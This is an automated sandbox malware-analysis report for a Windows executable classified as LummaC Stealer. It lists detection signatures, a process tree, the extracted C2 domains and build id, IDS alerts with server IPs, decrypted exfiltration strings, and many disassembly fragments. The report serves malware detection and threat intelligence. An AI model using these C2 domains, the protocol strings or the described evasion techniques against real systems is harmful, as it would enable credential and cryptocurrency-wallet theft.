Edit tour

Windows Analysis Report
0x001f00000004676d-1858.exe

Overview

General Information

Sample name:	0x001f00000004676d-1858.exe
Analysis ID:	1581423
MD5:	ab4263d8bd7675f83c88db675d103f3e
SHA1:	8e0496273f2114ff93831c89c2588c4bf6e3f031
SHA256:	1c8bbdd85f8966054492c3e859c42657e50398f01325b064426a584670646486
Tags:	exeuser-JaffaCakes118
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

0x001f00000004676d-1858.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\0x001f00000004676d-1858.exe" MD5: AB4263D8BD7675F83C88DB675D103F3E)

conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

0x001f00000004676d-1858.exe (PID: 4996 cmdline: "C:\Users\user\Desktop\0x001f00000004676d-1858.exe" MD5: AB4263D8BD7675F83C88DB675D103F3E)

0x001f00000004676d-1858.exe (PID: 4196 cmdline: "C:\Users\user\Desktop\0x001f00000004676d-1858.exe" MD5: AB4263D8BD7675F83C88DB675D103F3E)

0x001f00000004676d-1858.exe (PID: 2020 cmdline: "C:\Users\user\Desktop\0x001f00000004676d-1858.exe" MD5: AB4263D8BD7675F83C88DB675D103F3E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "mindhandru.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "cashfuzysao.buzz"], "Build id": "yau6Na--6299960613"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.2587726023.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.2615711054.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0x001f00000004676d-1858.exe PID: 2020	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0x001f00000004676d-1858.exe PID: 2020	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0x001f00000004676d-1858.exe PID: 2020	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0x001f00000004676d-1858.exe PID: 2020	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T15:34:57.678046+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.11.101	443	TCP
2024-12-27T15:35:29.900191+0100	2028371	3	Unknown Traffic	192.168.2.5	49741	104.21.74.40	443	TCP
2024-12-27T15:35:43.058758+0100	2028371	3	Unknown Traffic	192.168.2.5	49770	104.21.74.40	443	TCP
2024-12-27T15:35:45.528794+0100	2028371	3	Unknown Traffic	192.168.2.5	49776	104.21.74.40	443	TCP
2024-12-27T15:35:47.983491+0100	2028371	3	Unknown Traffic	192.168.2.5	49782	104.21.74.40	443	TCP
2024-12-27T15:35:50.294508+0100	2028371	3	Unknown Traffic	192.168.2.5	49790	104.21.74.40	443	TCP
2024-12-27T15:35:52.910954+0100	2028371	3	Unknown Traffic	192.168.2.5	49796	104.21.74.40	443	TCP
2024-12-27T15:35:56.040623+0100	2028371	3	Unknown Traffic	192.168.2.5	49804	104.21.74.40	443	TCP
2024-12-27T15:35:59.839892+0100	2028371	3	Unknown Traffic	192.168.2.5	49814	104.21.74.40	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T15:35:28.125233+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	104.21.11.101	443	TCP
2024-12-27T15:35:41.808798+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49741	104.21.74.40	443	TCP
2024-12-27T15:35:43.824284+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49770	104.21.74.40	443	TCP
2024-12-27T15:36:00.622792+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49814	104.21.74.40	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T15:35:28.125233+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49708	104.21.11.101	443	TCP
2024-12-27T15:35:41.808798+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49741	104.21.74.40	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T15:35:43.824284+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49770	104.21.74.40	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T15:35:46.501541+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49776	104.21.74.40	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://prisonyfork.buzz/	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/))	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/apie	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/api	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/3g	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/apib	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/Y	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/c	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz:443/apiu	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz/ak	Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "mindhandru.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "cashfuzysao.buzz"], "Build id": "yau6Na--6299960613"}

Machine Learning detection for sample

Source: 0x001f00000004676d-1858.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mindhandru.buzz
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String decryptor: yau6Na--6299960613

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 5_2_00415216 CryptUnprotectData,

5_2_00415216

Source: 0x001f00000004676d-1858.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49814 version: TLS 1.2

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B91FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B91FE9
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B91F38 FindFirstFileExW,	0_2_00B91F38
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B91FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00B91FE9
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B91F38 FindFirstFileExW,	3_2_00B91F38

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]	5_2_00427170
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov word ptr [eax], dx	5_2_00415216
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then inc ebx	5_2_004222A2
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 37A3DD63h	5_2_0043DC6A
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	5_2_0043FCD0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov byte ptr [esi], cl	5_2_0042CD97
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	5_2_0041BE10
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 385488F2h	5_2_0043DE17
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov byte ptr [edi], bl	5_2_0040DEBE
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov byte ptr [edi], bl	5_2_0040DEBE
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53BABCE5h	5_2_0040D715
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp+04h]	5_2_00439000
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then jmp eax	5_2_00439000
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edi, eax	5_2_00408820
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov byte ptr [edx], al	5_2_004090D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+40h]	5_2_004260DD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_00435880
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov dword ptr [esp+08h], ebp	5_2_00426090
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00417097
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov dword ptr [ebp-14h], eax	5_2_0041409E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	5_2_004160AC
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2341DD72h]	5_2_0040D94C
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ecx-62h]	5_2_0041417E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_0042A900
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	5_2_0041613C
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h	5_2_004169C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_004169C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then lea eax, dword ptr [esp+28h]	5_2_004239C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+26h]	5_2_0041D9D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_00427190
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov dword ptr [esi], 00000022h	5_2_0042A9A0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+72h]	5_2_004289B1
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov word ptr [ecx], si	5_2_0041CA48
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+40h]	5_2_004260DD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edx, ecx	5_2_0042DA08
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov word ptr [ecx], si	5_2_0041CA31
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	5_2_00414230
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then jmp dword ptr [004460D4h]	5_2_00414230
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	5_2_00414230
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then jmp dword ptr [004460D4h]	5_2_00414230
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebp+10h]	5_2_00439280
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edi, edx	5_2_00439280
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then test eax, eax	5_2_00439280
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edx, dword ptr [eax]	5_2_00439280
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, edx	5_2_0040AAA0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edx, ecx	5_2_0042D2BA
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov byte ptr [esi], cl	5_2_0042BB6C
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then jmp eax	5_2_00429B82
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then add eax, ebx	5_2_0042CB6D
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_0043E372
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h	5_2_00427BEA
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then jmp eax	5_2_00429B82
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then lea eax, dword ptr [esp+28h]	5_2_00423B80
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_00421B90
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]	5_2_00429BB6
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-000000DAh]	5_2_00429BB6
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_0042546B
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edi, dword ptr [0044A38Ch]	5_2_00409C3D
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_00429CF0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then jmp dword ptr [00447D28h]	5_2_00428C9B
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+4B939B60h]	5_2_00428C9B
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	5_2_00407540
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	5_2_00407540
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_0042BD50
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov word ptr [esi], ax	5_2_0041850C
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_0041AD3D
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_0041C5C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh	5_2_00415DC6
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_00416DA0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+00000158h]	5_2_0042DDAB
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_00408E50
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov ecx, eax	5_2_00408E50
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 9EB5184Bh	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edx, ecx	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 9EB5184Bh	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edx, ecx	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov word ptr [esi], ax	5_2_00417E2E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000C4h]	5_2_00429E35
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000C4h]	5_2_00429E35
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	5_2_0042AED0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-3A6ED29Dh]	5_2_0043E6DB
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+38h]	5_2_0040CEDB
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then push ebp	5_2_0040BF63
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h	5_2_00439760
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then lea eax, dword ptr [esp+28h]	5_2_00423720
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416FC1
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]	5_2_004297C1
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	5_2_00428FD0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 9EB5184Bh	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edx, ecx	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 9EB5184Bh	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then mov edx, ecx	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]	5_2_004297C1
